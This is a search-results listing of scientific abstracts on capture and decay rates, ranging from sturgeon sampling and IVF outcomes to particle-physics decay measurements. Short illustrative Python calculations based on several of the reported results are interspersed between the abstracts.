effects of environmental parameters on the probability of capturing endangered pallid sturgeon (Scaphirhynchus albus) using trotlines in the lower Mississippi River. Pallid sturgeon were sampled by trotlines year round from 2008 to 2011. A logistic regression model indicated water temperature (T; P < 0.01) and depth (D; P = 0.03) had significant effects on capture probability (Y = −1.75 − 0.06T + 0.10D). Habitat type, surface current velocity, river stage, stage change and non-sturgeon bycatch were not significant predictors (P = 0.26–0.63). Although pallid sturgeon were caught throughout the year, the model predicted that sampling should focus on times when the water temperature is less than 12°C and in deeper water to maximize capture probability; these water temperature conditions commonly occur during November to March in the lower Mississippi River. Further, the significant effect of water temperature which varies widely over time, as well as water depth indicate that any efforts to use the catch rate to infer population trends will require the consideration of temperature and depth in standardized sampling efforts or adjustment of estimates. 19. [Comparative analysis of pregnancy rate/captured oocytes in an in vitro fertilization program]. PubMed Kably Ambe, Alberto; Estévez González, Sergio; Carballo Mondragón, Esperanza; Durán Monterrosas, Leonor 2008-05-01 Since in vitro fertilization/embryo transfer is used as a common assisted reproductive technique there have been attempts to increase its success rate. One way is to obtain more good quality mature ovules to fertilize them, and two to three good quality embryos to transfer. 
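The pallid sturgeon study above reports a fitted logistic model for capture probability, Y = −1.75 − 0.06T + 0.10D. A minimal sketch of evaluating it, assuming Y is the linear predictor on the logit scale, T is water temperature in °C, and D is depth in the model's original units:

```python
import math

def capture_probability(temp_c, depth, b0=-1.75, b_temp=-0.06, b_depth=0.10):
    """Capture probability from the reported logistic model.

    Treats Y = b0 + b_temp*T + b_depth*D as the linear predictor on the
    logit scale, so p = 1 / (1 + exp(-Y)).
    """
    y = b0 + b_temp * temp_c + b_depth * depth
    return 1.0 / (1.0 + math.exp(-y))

# Cold, deep water (favoured by the model) vs warm, shallow water.
print(f"T=10, D=15: p = {capture_probability(10, 15):.2f}")  # ~0.30
print(f"T=25, D=5:  p = {capture_probability(25, 5):.2f}")   # ~0.06
```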
To determine if the number of retrieved oocytes is related with the pregnancy rate in IVF-ET. Reproductive and descriptive study; 172 patients in the IVF program were included. Whole patients had ovary stimulation with FSHr and antagonist multidose protocol. Five study groups were considered depending on the oocyte number retrieved. Data were analized and correlated with fertilization and pregnancy rate. There were no statistical differences among age, body mass index, percentage of mature oocyte, fertilization rate, embryo cell stage or basal levels of LH and Estradiol. Group three showed the highest pregnancy rate (64.29%) nevertheless group five had major number of embryo transferred (2.97 +/- 0.54 vs 3.17 +/- 0.45, p = 0.21). According to FSH doses given, group one had statistical difference related to group three, with higher dose (54.1 vs 62.1). According to previous studies, related to the number of oocyte retrieved, the possibility of pregnancy is higher with more than 13 oocytes retrieved (OR: 0.9 IC 95%: 0.4 -1.7). Pregnancy rate is higher when ten to fifteen oocytes were retrieved. 20. Rates, Polarizations, and Asymmetries in Charmless Vector-Vector B Decays SciTech Connect Aubert, B; Barate, R; Boutigny, D; Gaillard, J-M; Hicheur, A; Karyotakis, Y; Lees, J P; Robbe, P; Tisserand, V; Zghiche, A; Palano, A; Pompili, A; Chen, J C; Qi, N D; Rong, G; Wang, P; Zhu, Y S; Eigen, G; Ofte, I; Stugu, B; Abrams, G S; Borgland, A W; Breon, A B; Brown, D N; Button-Schaffer, J; Cahn, R N; Charles, E; Day, C T; Gill, M S; Gritsan, A V; Groysman, Y; Jacobsen, R G; Kadel, R W; Kadyk, J; Kerth, L T; Kolomensky, Yu. G; Kral, J F; Kukartsev, G; LeClerc, C; Levi, M E; Lynch, G; Mir, L M; Oddone, P J; Orimoto, T J; Pripstein, M; Roe, N A; Romosan, A; Ronan, M T; Shelkov, V G; Telnov, A V; Wenzel, W A; Harrison, T J; Hawkes, C M; Knowles, D J; Penny, R C; Watson, A T; Watson, N K; Deppermann, T; Goetzen, K; Koch, H; Lewandowski, B; Pelizaeus, M; Peters, K; Schmuecker, H; Barlow, N R; Bhimji, W; Boyd, J T; Chevalier, N; Cottingham, W N; Mackay, C; Wilson, F F; Hearty, C; Mattison, T S; McKenna, J A; Thiessen, D; Kyberd, P; McKemey, A K; Blinov, V E; Bukin, A D; Golubev, V B; Ivanchenko, V N; Kravchenko, E A; Onuchin, A P; Serednyakov, S I; Skovpen, Yu I; Solodov, E P; Yushkov, A N; Best, D; Chao, M; Kirkby, D; Lankford, A J; Mandelkern, M; McMahon, S; Mommsen, R K; Roethel, W; Stoker, D P; Buchanan, C; Hadavand, H K; Wright, Doug 2003-03-11 With a sample of approximately 89 million B{bar B} pairs collected with the BABAR detector, they measure branching fractions, determine the degree of longitudinal polarization, and search for direct CP violation in the decays B{sup 0} {yields} {phi}K*{sup 0} and B{sup +} {yields} {phi}K*{sup +}. They perform a search for other charmless vector-vector B decays involving {rho} and K*(892) resonances and observe the decays B{sup +} {yields} {rho}{sup 0} K*{sup +} and B{sup +} {yields} {rho}{sup 0}{rho}{sup +}. The branching fractions are measured to be {Beta}({phi}K*{sup 0}) = (11.1{sub -1.2}{sup +1.3} {+-} 1.1) x 10{sup -6}, {Beta}({phi}K*{sup +}) = (12.1{sub -1.9}{sup +2.1} {+-} 1.5) x 10{sup -6}, {Beta}({rho}{sup 0} K*{sup +}) = (7.7{sub -2.0}{sup +2.1} {+-} 1.4) x 10{sup -6}, and {Beta}({rho}{sup 0}{rho}{sup +}) = (9.9{sub -2.5}{sup +2.6} {+-} 2.5) x 10{sup -6}. The longitudinal polarization fractions are measured to be {Lambda}{sub L}/{Lambda}({phi}K*{sup 0}) = 0.65 {+-} 0.07 {+-} 0.04 and {Lambda}{sub L}/{Lambda}({phi}K*{sup +}) = 0.46 {+-} 0.12 {+-} 0.05. 
They measure the charge asymmetries: {Alpha}{sub CP}({phi}K*{sup 0}) = +0.04 {+-} 0.12 {+-} 0.02 and {Alpha}{sub CP}({phi}K*{sup +}) = +0.16 {+-} 0.17 {+-} 0.04. 1. Submicrosecond isomer in 45117Rh72 and the role of triaxiality in its electromagnetic decay rate Lalkovski, S.; Bruce, A. M.; Denis Bacelar, A. M.; Górska, M.; Pietri, S.; Podolyák, Zs.; Bednarczyk, P.; Caceres, L.; Casarejos, E.; Cullen, I. J.; Doornenbal, P.; Farrelly, G. F.; Garnsworthy, A. B.; Geissel, H.; Gelletly, W.; Gerl, J.; Grębosz, J.; Hinke, C.; Ilie, G.; Ivanova, D.; Jaworski, G.; Kisyov, S.; Kojouharov, I.; Kurz, N.; Minkov, N.; Myalski, S.; Palacz, M.; Petkov, P.; Prokopowicz, W.; Regan, P. H.; Schaffner, H.; Steer, S.; Tashenov, S.; Walker, P. M.; Wollersheim, H. J. 2013-08-01 The neutron-rich nucleus 117Rh was synthesized in the fission of a relativistic 238U beam produced at the GSI laboratory in Darmstadt, Germany. An isomeric state with t1/2=138(17) ns decaying by a single γ ray was observed, providing the first information on the excited states in this nucleus. The experimental data are discussed in terms of systematics and interpreted by using the Woods-Saxon deformed shell model and triaxial-rotor-plus-particle calculations. The origin of the isomer is explained as being due to a hindered E2 transition to the ground state. 2. Global existence and energy decay rates for a Kirchhoff-type wave equation with nonlinear dissipation. PubMed Kim, Daewook; Kim, Dojin; Hong, Keum-Shik; Jung, Il Hyo 2014-01-01 The first objective of this paper is to prove the existence and uniqueness of global solutions for a Kirchhoff-type wave equation with nonlinear dissipation of the form Ku'' + M(|A (1/2) u|(2))Au + g(u') = 0 under suitable assumptions on K, A, M(·), and g(·). Next, we derive decay estimates of the energy under some growth conditions on the nonlinear dissipation g. Lastly, numerical simulations in order to verify the analytical results are given. 3. Global Existence and Energy Decay Rates for a Kirchhoff-Type Wave Equation with Nonlinear Dissipation PubMed Central Kim, Dojin; Hong, Keum-Shik; Jung, Il Hyo 2014-01-01 The first objective of this paper is to prove the existence and uniqueness of global solutions for a Kirchhoff-type wave equation with nonlinear dissipation of the form Ku′′ + M(|A1/2u|2)Au + g(u′) = 0 under suitable assumptions on K, A, M(·), and g(·). Next, we derive decay estimates of the energy under some growth conditions on the nonlinear dissipation g. Lastly, numerical simulations in order to verify the analytical results are given. PMID:24977217 4. A measurement of the 2 neutrino double beta decay rate of tellurium-130 in the CUORICINO experiment Kogler, Laura Katherine CUORICINO was a cryogenic bolometer experiment designed to search for neutrinoless double beta decay and other rare processes, including double beta decay with two neutrinos (2nubetabeta). The experiment was located at Laboratori Nazionali del Gran Sasso and ran for a period of about 5 years, from 2003 to 2008. The detector consisted of an array of 62 TeO2 crystals arranged in a tower and operated at a temperature of ˜10 mK. Events depositing energy in the detectors, such as radioactive decays or impinging particles, produced thermal pulses in the crystals which were read out using sensitive thermistors. The experiment included 4 enriched crystals, 2 enriched with 130Te and 2 with 128Te, in order to aid in the measurement of the 2nubetabeta rate. The enriched crystals contained a total of ˜350 g 130Te. 
The 128-enriched (130-depleted) crystals were used as background monitors, so that the shared backgrounds could be subtracted from the energy spectrum of the 130-enriched crystals. Residual backgrounds in the subtracted spectrum were fit using spectra generated by Monte-Carlo simulations of natural radioactive contaminants located in and on the crystals. The 2nubetabeta half-life was measured to be T1/2 = [9.81 +/- 0.96(stat) +/- 0.49(syst)] x 1020 y. 5. Measurement of the rate of charm quark pairs produced by radiated gluons in hadronic Z decay Park, Hyangkyu 1998-11-01 We have measured the probability of gluon splitting to charm quark pairs using 1.7 million hadronic Z decays collected in 1994 and 1995 at the L3 detector. Although this process, gluon splitting to charm quark pairs, is one of the basic processes in QCD, it has not been well understood both theoretically and experimentally. Furthermore, the limited knowledge of this process is one of the biggest sources of error in the measurement of the fraction of Z decays to bottom quark pairs (Rb). For this measurement, we have applied two methods to events with a three-jet event topology. One method. relies on tagging charm hadrons by identifying a lepton in the lowest energy jet. Another method uses a neural network technique for identifying events containing gluon splitting into charm quark pairs. Though the first method provides a simple way to tag a charm quark, it is limited by statistics. The second method improves the statistical accuracy by utilizing the entire hadronic event sample. Combining both methods, we measure the average number of gluons splitting into charm quark pairs per hadronic event to be overlinenoverlineg-->coverlinecoverline =(2.22+/-0.18+/-0.44) %. We performed a combined fit with this result and other existing measurements of overlinenoverlineg-->coverlinecoverline at LEP experiments. The result allows a stringent test of various QCD models and reduces the single biggest source of systematic error in the measurement of Rb. 6. Constraints on the {tau} neutrino mass and mixing from precise measurements of {tau} decay rates SciTech Connect Swain, J.; Taylor, L. 1997-01-01 We have derived constraints on the {tau} neutrino mass and fourth generation mixing from an analysis of the partial widths of {tau} lepton decays, in particular, {tau}{sup {minus}}{r_arrow}e{sup {minus}}{bar {nu}}{sub e}{nu}{sub {tau}}, {tau}{sup {minus}}{r_arrow}{mu}{sup {minus}}{bar {nu}}{sub {mu}}{nu}{sub {tau}}, {tau}{r_arrow}{pi}{sup {minus}}{nu}{sub {tau}}, and {tau}{r_arrow}K{sup {minus}}{nu}{sub {tau}}. We present predictions for the {tau} decay widths, allowing for a nonzero {tau} neutrino mass m{sub {nu}{sub {tau}}} and for mixing with a neutrino of mass m{sub {nu}{sub L}}{gt}M{sub Z}/2, which is parametrized using a Cabibbo-like mixing angle {theta}{sub L}. By comparison of these theoretical predictions with the experimental measurements, we obtain the following bounds at the 90{percent} confidence level: m{sub {nu}{sub {tau}}}{lt}42 MeV and sin{sup 2}{theta}{sub L}{lt}0.014. {copyright} {ital 1997} {ital The American Physical Society} 7. Reaction rate calibration techniques at ZPPR for /sup 239/Pu fission, /sup 235/U fission, /sup 238/U fission, and /sup 238/U capture SciTech Connect 1982-06-10 Reaction-rate calibration techniques used at ZPPR are described for /sup 239/Pu fission, /sup 235/U fission, /sup 238/U fission and /sup 238/U capture. 
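As a rough consistency check on the CUORICINO numbers above, the 350 g of 130Te and the measured 2νββ half-life imply a decay rate of order a few events per day. A back-of-the-envelope sketch that ignores detector efficiency, live time and containment:

```python
import math

N_A = 6.022e23            # Avogadro's number, 1/mol
MOLAR_MASS_TE130 = 129.9  # g/mol, approximate

def decays_per_year(mass_g, half_life_years, molar_mass=MOLAR_MASS_TE130):
    """Expected decays per year for a given isotope mass and half-life."""
    n_atoms = mass_g / molar_mass * N_A
    decay_constant = math.log(2) / half_life_years  # per year
    return n_atoms * decay_constant

rate = decays_per_year(mass_g=350.0, half_life_years=9.81e20)
print(f"~{rate:.0f} 2nbb decays per year, i.e. ~{rate / 365:.1f} per day")
```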
In addition to these absolute reaction rates, calibration techniques are described for fission-rate ratios and the ratio of /sup 238/U capture to /sup 239/U capture to /sup 239/Pu fission. Uncertainty estimates are presented for all calibrations. Intercomparison measurements are reported which support the validity of the calibration techniques and their estimated uncertainties. 8. Modularity and rates of evolutionary change in a power-amplified prey capture system. PubMed Claverie, Thomas; Patek, S N 2013-11-01 The dynamic interplay among structure, function, and phylogeny form a classic triad of influences on the patterns and processes of biological diversification. Although these dynamics are widely recognized as important, quantitative analyses of their interactions have infrequently been applied to biomechanical systems. Here we analyze these factors using a fundamental biomechanical mechanism: power amplification. Power-amplified systems use springs and latches to generate extremely fast and powerful movements. This study focuses specifically on the power amplification mechanism in the fast raptorial appendages of mantis shrimp (Crustacea: Stomatopoda). Using geometric morphometric and phylogenetic comparative analyses, we measured evolutionary modularity and rates of morphological evolution of the raptorial appendage's biomechanical components. We found that "smashers" (hammer-shaped raptorial appendages) exhibit lower modularity and 10-fold slower rates of morphological change when compared to non-smashers (spear-shaped or undifferentiated appendages). The morphological and biomechanical integration of this system at a macroevolutionary scale and the presence of variable rates of evolution reveal a balance between structural constraints, functional variation, and the "roles of development and genetics" in evolutionary diversification. © 2013 The Author(s). Evolution © 2013 The Society for the Study of Evolution. 9. Improving rate capability and decelerating voltage decay of Li-rich layered oxide cathodes via selenium doping to stabilize oxygen Ma, Quanxin; Li, Ruhong; Zheng, Rujuan; Liu, Yuanlong; Huo, Hua; Dai, Changsong 2016-11-01 To improve the rate performance and decelerate the voltage decay of Li-rich layered oxide cathode materials, a series of cathode materials Li1.2[Mn0.7Ni0.2Co0.1]0.8-xSexO2 (x = 0, 0.07, 0.14 and 0.21) was synthesized via co-precipitation. Based on the characterization results, it can be concluded that uniform Se6+ doping can improve the degree of crystallinity of Li2MnO3, resulting in a better ordering of atoms in the transition metal layer of this type of cathode materials. In the electrochemical experiments, compared to un-doped samples, one of the Se doped samples (LLMO-Se0.14) exhibited a longer sloping region and shorter potential plateau in the initial charge curves, a larger first coulombic efficiency (ca. 77%), better rate capability (178 mAhm g-1 at 10 C) and higher mid-point voltage (MPV) retention (ca. 95%) after 100 cycles. These results prove that Se doping can effectively improve the rate capability and decelerate the voltage decay process of these cathode materials during cycling via suppressing the oxidation process of O2- to O2 and curbing a layered-to-spinel phase transformation. The above-mentioned functions of Se doping are probably due to the higher bonding energy of Sesbnd O than that of Mnsbnd O. 10. Disintegration rate and gamma ray emission probability per decay measurement of 123I. 
PubMed Koskinas, M F; Gishitomi, K C; Brito, A B; Yamazaki, I M; Dias, M S 2012-09-01 A series of (123)I measurements have been carried out in a 4π(e(A),X)-γ coincidence system. The experimental extrapolation curve was determined and compared to Monte Carlo simulation, performed by code ESQUEMA. From the slope of the experimental curve, the total conversion coefficient for the 159 keV total gamma transition, α(159), was determined. All radioactive sources were also measured in an HPGe spectrometry system, in order to determine the gamma-ray emission probability per decay for several gamma transitions. All uncertainties involved and their correlations were analyzed applying the covariance matrix methodology and the measured parameters were compared with those from the literature. Copyright © 2012 Elsevier Ltd. All rights reserved. 11. Measurement of branching fractions and rate asymmetries in the rare decays B→K(*)l⁺l⁻ DOE PAGES Lees, J. P.; Poireau, V.; Tisserand, V.; ... 2012-08-24 In a sample of 471×10⁶ BB¯¯¯ events collected with the BABAR detector at the PEP-II e⁺e⁻ collider we study the rare decays B→K(*)l⁺l⁻, where l⁺l⁻ is either e⁺e⁻ or μ⁺μ⁻. We report results on partial branching fractions and isospin asymmetries in seven bins of dilepton mass-squared. We further present CP and lepton-flavor asymmetries for dilepton masses below and above the J/ψ resonance. We find no evidence for CP or lepton-flavor violation. The partial branching fractions and isospin asymmetries are consistent with the Standard Model predictions and with results from other experiments. 12. Moments of the B meson inclusive semileptonic decay rate using neutrino reconstruction Csorna, S. E.; Bonvicini, G.; Cinabro, D.; Dubrovin, M.; Bornheim, A.; Lipeles, E.; Pappas, S. P.; Shapiro, A.; Weinstein, A. J.; Briere, R. A.; Chen, G. P.; Ferguson, T.; Tatishvili, G.; Vogel, H.; Watkins, M. E.; Adam, N. E.; Alexander, J. P.; Berkelman, K.; Boisvert, V.; Cassel, D. G.; Duboscq, J. E.; Ecklund, K. M.; Ehrlich, R.; Galik, R. S.; Gibbons, L.; Gittelman, B.; Gray, S. W.; Hartill, D. L.; Heltsley, B. K.; Hsu, L.; Jones, C. D.; Kandaswamy, J.; Kreinick, D. L.; Kuznetsov, V. E.; Magerkurth, A.; Mahlke-Krüger, H.; Meyer, T. O.; Patterson, J. R.; Pedlar, T. K.; Peterson, D.; Pivarski, J.; Riley, D.; Sadoff, A. J.; Schwarthoff, H.; Shepherd, M. R.; Sun, W. M.; Thayer, J. G.; Urner, D.; Wilksen, T.; Weinberger, M.; Athar, S. B.; Avery, P.; Breva-Newell, L.; Potlia, V.; Stoeck, H.; Yelton, J.; Eisenstein, B. I.; Gollin, G. D.; Karliner, I.; Lowrey, N.; Naik, P.; Sedlack, C.; Selen, M.; Thaler, J. J.; Williams, J.; Edwards, K. W.; Besson, D.; Gao, K. Y.; Gong, D. T.; Kubota, Y.; Li, S. Z.; Poling, R.; Scott, A. W.; Smith, A.; Stepaniak, C. J.; Urheim, J.; Metreveli, Z.; Seth, K. K.; Tomaradze, A.; Zweber, P.; Ernst, J.; Arms, K.; Eckhart, E.; Gan, K. K.; Gwon, C.; Severini, H.; Skubic, P.; Asner, D. M.; Dytman, S. A.; Mehrabyan, S.; Mueller, J. A.; Nam, S.; Savinov, V.; Huang, G. S.; Miller, D. H.; Pavlunin, V.; Sanghi, B.; Shibata, E. I.; Shipsey, I. P.; Adams, G. S.; Chasse, M.; Cummings, J. P.; Danko, I.; Napolitano, J.; Cronin-Hennessy, D.; Park, C. S.; Park, W.; Thayer, J. B.; Thorndike, E. H.; Coan, T. E.; Gao, Y. S.; Liu, F.; Stroynowski, R.; Artuso, M.; Boulahouache, C.; Blusk, S.; Butt, J.; Dambasuren, E.; Dorjkhaidav, O.; Haynes, J.; Menaa, N.; Mountain, R.; Muramatsu, H.; Nandakumar, R.; Redjimi, R.; Sia, R.; Skwarnicki, T.; Stone, S.; Wang, J. C.; Zhang, Kevin; Mahmood, A. H. 
2004-08-01 We present a measurement of the composition of B meson inclusive semileptonic decays using 9.4 fb-1 of e+e- data taken with the CLEO detector at the Υ(4S) resonance. In addition to measuring the charged lepton kinematics, the neutrino four-vector is inferred using the hermiticity of the detector. We perform a maximum likelihood fit over the full three-dimensional differential decay distribution for the fractional contributions from the B→Xclν processes with Xc=D, D*, D**, and nonresonant Xc, and the process B→Xulν. From the fit results we extract the first and second moments of the M2X and q2 distributions with minimum lepton-energy requirements of 1.0 GeV and 1.5 GeV. We find =(0.456±0.014±0.045±0.109) GeV2/c4 with a minimum lepton energy of 1.0 GeV and =(0.293±0.012±0.033±0.048) GeV2/c4 with minimum lepton energy of 1.5 GeV. The uncertainties are from statistics, detector systematic effects, and model dependence, respectively. As a test of the HQET and OPE calculations, the results for the M2X moment as a function of the minimum lepton energy requirement are compared to the predictions. 13. Air sampling by pumping through a filter: effects of air flow rate, concentration, and decay of airborne substances. PubMed Šoštarić, Marko; Petrinec, Branko; Babić, Dinko 2016-12-01 This paper tackles the issue of interpreting the number of airborne particles adsorbed on a filter through which a certain volume of sampled air has been pumped. This number is equal to the product of the pumped volume and particle concentration in air, but only if the concentration is constant over time and if there is no substance decomposition on the filter during sampling. If this is not the case, one must take into account the inconstancy of the concentration and the decay law for a given substance, which is complicated even further if the flow rate through the filter is not constant. In this paper, we develop a formalism which considers all of these factors, resulting in a single, compact expression of general applicability. The use of this expression is exemplified by addressing a case of sampling airborne radioactive matter, where the decay law is already well known. This law is combined with three experimentally observed time dependence of the flow rate and two models for the time dependence of the particle concentration. We also discuss the implications of these calculations for certain other situations of interest to environmental studies. 14. Capturing Age-group Differences and Developmental Change with the BASC Parent Rating Scales PubMed Central Barbot, Baptiste; Hein, Sascha; Luthar, Suniya S.; Grigorenko, Elena L. 2014-01-01 Estimation of age-group differences and intra-individual change across distinct developmental periods is often challenged by the use of age-appropriate (but non-parallel) measures. We present a short version of the Behavior Assessment System (Reynolds & Kamphaus, 1998), Parent Rating Scales for Children (PRS-C) and Adolescents (PRS-A), which uses only their common-items to derive estimates of the initial constructs optimized for developmental studies. Measurement invariance of a three-factor model (Externalizing, Internalizing, Adaptive Skills) was tested across age-groups (161 mothers using PRS-C; 200 mothers using PRS-A) and over time (115 mothers using PRS-C at baseline and PRS-A five years later) with the original versus short PRS. 
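The air-sampling abstract above combines a time-varying concentration, a time-varying flow rate and radioactive decay on the filter. The paper derives a compact closed-form expression; the sketch below is only a generic numerical illustration of the underlying balance dN/dt = c(t)Q(t) − λN(t), with made-up concentration and flow profiles:

```python
import math

def atoms_on_filter(conc, flow, decay_const, t_end, dt=1.0):
    """Integrate dN/dt = c(t)*Q(t) - lambda*N(t) with a simple Euler scheme.

    conc        -- function t -> concentration in air (atoms per m^3)
    flow        -- function t -> volumetric flow rate (m^3 per s)
    decay_const -- decay constant lambda (1/s)
    t_end, dt   -- sampling duration and time step (s)
    """
    n, t = 0.0, 0.0
    while t < t_end:
        n += (conc(t) * flow(t) - decay_const * n) * dt
        t += dt
    return n

def conc(t):   # atoms/m^3, decreasing during sampling (hypothetical)
    return 1.0e6 * math.exp(-t / 3600.0)

def flow(t):   # m^3/s, dropping as the filter loads (hypothetical)
    return 2.0e-3 * (1.0 - 0.3 * t / 3600.0)

lam = math.log(2) / 1800.0   # 30-minute half-life (hypothetical nuclide)
print(f"Atoms on filter after 1 h: {atoms_on_filter(conc, flow, lam, 3600.0):.3g}")
print(f"Naive c0*Q0*T estimate:    {1.0e6 * 2.0e-3 * 3600.0:.3g}")
```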
Results indicated that the short PRS holds a sufficient level of invariance for a robust estimation of age-group differences and intra-individual change, as compared to the original PRS, which held only weak invariance leading to flawed developmental inferences. Importance of test-content parallelism for developmental studies is discussed. PMID:25045196 15. Low temperature rate constants for the N + CN → N2 + C reaction: two-dimensional quantum capture calculations on an accurate potential energy surface. PubMed Ma, Jianyi; Guo, Hua; Dawes, Richard 2012-09-21 The title reaction is thought to be responsible for the production of molecular nitrogen in interstellar clouds. In this work, we report quantum capture calculations on a new two-dimensional potential energy surface determined by interpolating high-level ab initio data. The low-temperature rate constant calculated using a capture model is quite large and has a positive temperature dependence, in agreement with a recent experiment. The origin of the aforementioned behaviors of the rate constant is analyzed. 16. Estimation of peacock bass (Cichla spp.) mortality rate during catch-release fishing employing different post-capture procedures. PubMed Barroco, L S A; Freitas, C E C; Lima, Á C 2017-08-17 The effect of catch-and-release fishing on the survival of peacock bass (Cichla spp.) was evaluated by comparing two types of artificial bait (jig and shallow-diver plugs) and two types of post-catch confinement. Two experiments were conducted during the periods January-February and October-November 2012 in the Unini River, a right-bank tributary of the Negro River. In total, 191 peacock bass were captured. Both groups of fish were subjected to experimental confinement (collective and individual) for three days. Additionally, 11 fish were tagged with radio transmitters for telemetry monitoring. Mortality rate was estimated as the percentage of dead individuals for each type of bait and confinement. For peacock bass caught with jig baits, mortality was zero. The corresponding figure for shallow-diver bait was 1.66% for fish in collective containment, 18.18% for fish monitored by telemetry and 0% for individuals confined individually. Our results show low post-release mortality rates for peacock bass. Furthermore, neither the type of confinement nor the type of bait had a statistically significant influence on mortality rates. While future studies could include other factors in the analysis, our results show that catch-and-release fishing results in low mortality rates. 17. EFFECTS OF TURBULENCE, ECCENTRICITY DAMPING, AND MIGRATION RATE ON THE CAPTURE OF PLANETS INTO MEAN MOTION RESONANCE SciTech Connect Ketchum, Jacob A.; Adams, Fred C.; Bloch, Anthony M. 2011-01-01 Pairs of migrating extrasolar planets often lock into mean motion resonance as they drift inward. This paper studies the convergent migration of giant planets (driven by a circumstellar disk) and determines the probability that they are captured into mean motion resonance. The probability that such planets enter resonance depends on the type of resonance, the migration rate, the eccentricity damping rate, and the amplitude of the turbulent fluctuations. This problem is studied both through direct integrations of the full three-body problem and via semi-analytic model equations. In general, the probability of resonance decreases with increasing migration rate, and with increasing levels of turbulence, but increases with eccentricity damping. 
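As a small aside on the resonance-capture abstract above, the nominal location of a (p+q):p mean motion resonance follows directly from Kepler's third law; a minimal sketch:

```python
def resonance_axis_ratio(p, q):
    """Semimajor-axis ratio a_outer / a_inner for the (p+q):p mean motion
    resonance, from Kepler's third law (P proportional to a**1.5)."""
    period_ratio = (p + q) / p
    return period_ratio ** (2.0 / 3.0)

# First-order resonances commonly reached by convergent migration.
for p, q in [(1, 1), (2, 1), (3, 1)]:
    print(f"{p + q}:{p} resonance -> a_out/a_in = {resonance_axis_ratio(p, q):.3f}")
```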
Previous work has shown that the distributions of orbital elements (eccentricity and semimajor axis) for observed extrasolar planets can be reproduced by migration models with multiple planets. However, these results depend on resonance locking, and this study shows that entry into-and maintenance of-mean motion resonance depends sensitively on the migration rate, eccentricity damping, and turbulence. 18. A measurement of the 2 neutrino double beta decay rate of Te-130 in the CUORICINO experiment SciTech Connect Kogler, Laura K. 2011-11-30 CUORICINO was a cryogenic bolometer experiment designed to search for neutrinoless double beta decay and other rare processes, including double beta decay with two neutrinos (2vββ). The experiment was located at Laboratori Nazionali del Gran Sasso and ran for a period of about 5 years, from 2003 to 2008. The detector consisted of an array of 62 TeO2 crystals arranged in a tower and operated at a temperature of 10 mK. Events depositing energy in the detectors, such as radioactive decays or impinging particles, produced thermal pulses in the crystals which were read out using sensitive thermistors. The experiment included 4 enriched crystals, 2 enriched with 130Te and 2 with 128Te, in order to aid in the measurement of the 2vββ rate. The enriched crystals contained a total of 350 g 130Te. The 128-enriched (130-depleted) crystals were used as background monitors, so that the shared backgrounds could be subtracted from the energy spectrum of the 130- enriched crystals. Residual backgrounds in the subtracted spectrum were fit using spectra generated by Monte-Carlo simulations of natural radioactive contaminants located in and on the crystals. The 2vββ half-life was measured to be T2v1/2 = [9.81± 0.96(stat)± 0.49(syst)] x1020 y. 19. Effects of Biogents Sentinel Trap Field Placement on Capture Rates of Adult Asian Tiger Mosquitoes, Aedes albopictus PubMed Central Crepeau, Taryn N.; Healy, Sean P.; Bartlett-Healy, Kristen; Unlu, Isik; Farajollahi, Ary; Fonseca, Dina M. 2013-01-01 20. Precision measurement of the decay rate of {sup 7}Be in host materials SciTech Connect Nir-El, Y.; Haquin, G.; Yungreiss, Z.; Hass, M.; Goldring, G.; Chamoli, S. K.; Singh, B. S. Nara; Lakshmi, S.; Koester, U.; Champault, N.; Dorsival, A.; Fedoseyev, V. N.; Georgiev, G.; Schumann, D.; Heidenreich, G.; Teichmann, S. 2007-01-15 A controlled and precise determination of the cross sections of the fusion reactions {sup 7}Be(p,{gamma}){sup 8}B and {sup 3}He({sup 4}He,{gamma}){sup 7}Be, which play an important role in determining the solar neutrino flux, necessitates the knowledge of a precise value of the electron-capture half-life of {sup 7}Be. This half-life may depend on the material hosting the {sup 7}Be atoms via small modifications of the electron density around the {sup 7}Be nucleus. In this brief communication we report on the measurement of {sup 7}Be implanted in four materials: copper, aluminum, sapphire, and PVC. The four results are consistent with a null host dependence within two standard deviations and their weighted average of 53.236(39) d agrees very well with the adopted value in the literature, 53.22(6) d. The present results may exhibit a slight (0.22%) increase of the half-life at room temperature for metals compared to insulators that requires further studies. 1. Λ_{c}→Λl^{+}ν_{l} Form Factors and Decay Rates from Lattice QCD with Physical Quark Masses. 
PubMed Meinel, Stefan 2017-02-24 The first lattice QCD calculation of the form factors governing Λ_{c}→Λℓ^{+}ν_{ℓ} decays is reported. The calculation was performed with two different lattice spacings and includes one ensemble with a pion mass of 139(2) MeV. The resulting predictions for the Λ_{c}→Λe^{+}ν_{e} and Λ_{c}→Λμ^{+}ν_{μ} decay rates divided by |V_{cs}|^{2} are 0.2007(71)(74) and 0.1945(69)(72)  ps^{-1}, respectively, where the two uncertainties are statistical and systematic. Taking the Cabibbo-Kobayashi-Maskawa (CKM) matrix element |V_{cs}| from a global fit and the Λ_{c} lifetime from experiments, this translates to branching fractions of B(Λ_{c}→Λe^{+}ν_{e})=0.0380(19)_{LQCD}(11)_{τ_{Λ_{c}}} and B(Λ_{c}→Λμ^{+}ν_{μ})=0.0369(19)_{LQCD}(11)_{τ_{Λ_{c}}}. These results are consistent with, and two times more precise than, the measurements performed recently by the BESIII Collaboration. Using instead the measured branching fractions together with the lattice calculation to determine the CKM matrix element gives |V_{cs}|=0.949(24)_{LQCD}(14)_{τ_{Λ_{c}}}(49)_{B}. 2. Λc→Λ l+νl Form Factors and Decay Rates from Lattice QCD with Physical Quark Masses Meinel, Stefan 2017-02-01 The first lattice QCD calculation of the form factors governing Λc→Λ ℓ+νℓdecays is reported. The calculation was performed with two different lattice spacings and includes one ensemble with a pion mass of 139(2) MeV. The resulting predictions for the Λc→Λe +νe and Λc→Λ μ+νμ decay rates divided by |Vc s|2 are 0.2007(71)(74) and 0.1945 (69 )(72 ) ps-1 , respectively, where the two uncertainties are statistical and systematic. Taking the Cabibbo-Kobayashi-Maskawa (CKM) matrix element |Vc s| from a global fit and the Λc lifetime from experiments, this translates to branching fractions of B (Λc→Λ e+νe)=0.0380 (19 )LQCD(11 )τ Λ c and B (Λc→Λ μ+νμ)=0.0369 (19 )LQCD(11 )τΛc . These results are consistent with, and two times more precise than, the measurements performed recently by the BESIII Collaboration. Using instead the measured branching fractions together with the lattice calculation to determine the CKM matrix element gives |Vc s|=0.949 (24 )LQCD(14 )τΛc(49 )B . 3. Damping rates of surface plasmons for particles of size from nano- to micrometers; reduction of the nonradiative decay Kolwas, K.; Derkachova, A. 2013-01-01 Damping rates of multipolar, localized surface plasmons (SPs) of gold and silver nanospheres of radii up to 1000 nm were found with the tools of classical electrodynamics. The significant increase in damping rates followed 